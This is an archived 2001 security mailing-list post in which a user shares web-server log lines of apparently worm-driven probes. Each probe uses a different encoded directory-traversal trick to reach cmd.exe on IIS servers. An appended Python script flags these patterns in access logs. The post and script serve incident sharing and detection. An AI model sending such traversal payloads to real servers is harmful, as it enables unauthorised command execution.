Hi,

found this in my logs this afternoon, you may find it interesting. from what I can tell it's following a similar pattern of address scanning as CRII -- looks like too many hosts, too quickly to be manual scanning:

here's a sample, the full log is at http://88.net/~thomas/codeindigo.txt [for want of a better name]

209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:02 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:05 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:06 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:07 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:12 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

regards,
-thomas

--
Do what thou wilt shall be the whole of the Law. -- Aleister Crowley
gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
2B72 53DB 8104 2041 BDB4 F053 4AE5 01DF 81FD 4B43

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:11:19 PDT
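
An added example, not part of the original post: one way to flag this request pattern in an Apache combined-format access log, by decoding each path repeatedly and grouping flagged requests per source inside a short time window. The function names `classify` and `burst_sources` and the thresholds are illustrative assumptions; the first four sample lines are copied from the post and the last one is constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_to_bytes

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" \d{3} ')

# First four lines are from the post above; the last line is constructed (benign client).
SAMPLE = r'''209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
192.0.2.10 - - [18/Sep/2001:13:24:20 +0000] "GET /index.html HTTP/1.0" 200 1043 "-" "-"'''.splitlines()

def classify(target):
    """Reasons a request target looks like an encoded-traversal probe (empty set = clean)."""
    path = target.split("?", 1)[0].encode("latin-1", "replace")
    rounds = 0
    while rounds < 4:                       # decode repeatedly: %255c -> %5c -> backslash
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    reasons = set()
    if rounds > 1:                          # needed more than one decoding pass
        reasons.add("multi-encoded")
    if b"\xc0" in path or b"\xc1" in path:  # 0xC0/0xC1 never start a valid UTF-8 sequence
        reasons.add("overlong-utf8")
    if b"../" in path.replace(b"\\", b"/"):
        reasons.add("traversal")
    if path.lower().endswith(b"cmd.exe"):
        reasons.add("cmd.exe")
    return reasons

def burst_sources(lines, min_hits=3, window_s=60):
    """Map source IP -> reasons, for sources with >= min_hits flagged requests in window_s."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and (r := classify(m.group(3))):
            when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
            hits[m.group(1)].append((when, r))
    out = {}
    for ip, events in hits.items():
        times = sorted(t for t, _ in events)
        if any((times[i + min_hits - 1] - times[i]).total_seconds() <= window_s
               for i in range(len(times) - min_hits + 1)):
            out[ip] = set().union(*(r for _, r in events))
    return out
```
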